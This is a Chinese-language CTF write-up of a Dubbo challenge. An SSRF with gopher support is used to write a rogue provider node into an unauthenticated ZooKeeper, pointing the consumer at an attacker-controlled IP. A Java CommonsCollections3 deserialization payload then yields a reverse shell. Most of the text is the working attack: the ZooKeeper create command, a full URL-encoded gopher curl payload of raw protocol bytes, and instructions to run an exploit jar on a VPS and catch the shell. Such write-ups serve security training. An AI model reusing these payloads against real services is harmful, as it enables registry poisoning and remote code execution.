给选手提供dockerfile
题目8080端口是一个dubbo服务,8090端口是一个php ssrf,支持gopher。 参考dockerfile可以看到,flag在dubbo-consumer中,而consumer只有web端口开放,因此需要借助ssrf实现dubbo-consumer rce
首先要明白dubbo consumer与provider的通信。consumer从zookeeper中拿到注册的provider地址,然后与provider进行rpc,但是zookeeper通常是未授权的,因此我们可以通过ssrf攻击zookeeper改变provider的地址,这样consumer就能访问我们的evil provider了。
dubbo consumer在处理provider返回的数据时,会对rpc结果进行反序列化,反序列化的方式由返回的flag决定。 题目的pom中不存在dubbo hessian的gadget,只有cc3,因此可以通过一个evil provider实现java反序列化。
通过ssrf创建一个provider节点,也就是exp.py实现的内容
create /dubbo/dubbo.service.DemoService/providers/dubbo%3A%2F%2F139.199.203.253%3A20890%2Fdubbo.service.DemoService%3Fanyhost%3Dtrue%26application%3Ddubbo-provider%26bean.name%3DServiceBean%3Adubbo.service.DemoService%3A1.0.0%26deprecated%3Dfalse%26dubbo%3D2.0.2%26dynamic%3Dtrue%26generic%3Dfalse%26interface%3Ddubbo.service.DemoService%26methods%3DsayHello%26pid%3D41643%26register%3Dtrue%26release%3D2.7.3%26revision%3D1.0.0%26side%3Dprovider%26serialization%3djava%26timestamp%3D1605961792779%26version%3D1.0.0 139.199.203.253
curl gopher://127.0.0.1:9991/_%00%00%00%2d%00%00%00%00%00%00%00%00%00%00%00%00%00%00%75%30%00%00%00%00%00%00%00%00%00%00%00%10%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%02%39%00%00%00%2e%00%00%00%01%00%00%01%fb%2f%64%75%62%62%6f%2f%64%75%62%62%6f%2e%73%65%72%76%69%63%65%2e%44%65%6d%6f%53%65%72%76%69%63%65%2f%70%72%6f%76%69%64%65%72%73%2f%64%75%62%62%6f%25%33%41%25%32%46%25%32%46%31%33%39%2e%31%39%39%2e%32%30%33%2e%32%35%33%25%33%41%32%30%38%39%30%25%32%46%64%75%62%62%6f%2e%73%65%72%76%69%63%65%2e%44%65%6d%6f%53%65%72%76%69%63%65%25%33%46%61%6e%79%68%6f%73%74%25%33%44%74%72%75%65%25%32%36%61%70%70%6c%69%63%61%74%69%6f%6e%25%33%44%64%75%62%62%6f%2d%70%72%6f%76%69%64%65%72%25%32%36%62%65%61%6e%2e%6e%61%6d%65%25%33%44%53%65%72%76%69%63%65%42%65%61%6e%25%33%41%64%75%62%62%6f%2e%73%65%72%76%69%63%65%2e%44%65%6d%6f%53%65%72%76%69%63%65%25%33%41%31%2e%30%2e%30%25%32%36%64%65%70%72%65%63%61%74%65%64%25%33%44%66%61%6c%73%65%25%32%36%64%75%62%62%6f%25%33%44%32%2e%30%2e%32%25%32%36%64%79%6e%61%6d%69%63%25%33%44%74%72%75%65%25%32%36%67%65%6e%65%72%69%63%25%33%44%66%61%6c%73%65%25%32%36%69%6e%74%65%72%66%61%63%65%25%33%44%64%75%62%62%6f%2e%73%65%72%76%69%63%65%2e%44%65%6d%6f%53%65%72%76%69%63%65%25%32%36%6d%65%74%68%6f%64%73%25%33%44%73%61%79%48%65%6c%6c%6f%25%32%36%70%69%64%25%33%44%34%31%36%34%33%25%32%36%72%65%67%69%73%74%65%72%25%33%44%74%72%75%65%25%32%36%72%65%6c%65%61%73%65%25%33%44%32%2e%37%2e%33%25%32%36%72%65%76%69%73%69%6f%6e%25%33%44%31%2e%30%2e%30%25%32%36%73%69%64%65%25%33%44%70%72%6f%76%69%64%65%72%25%32%36%73%65%72%69%61%6c%69%7a%61%74%69%6f%6e%25%33%64%6a%61%76%61%25%32%36%74%69%6d%65%73%74%61%6d%70%25%33%44%31%36%30%35%39%36%31%37%39%32%37%37%39%25%32%36%76%65%72%73%69%6f%6e%25%33%44%31%2e%30%2e%30%00%00%00%0f%31%33%39%2e%31%39%39%2e%32%30%33%2e%32%35%33%00%00%00%01%00%00%00%1f%00%00%00%05%77%6f%72%6c%64%00%00%00%06%61%6e%79%6f%6e%65%00%00%00%00
编译java_exp文件夹中的项目得到exp.jar,在vps上运行exp.jar,再在另一台上监听,即可收到shell
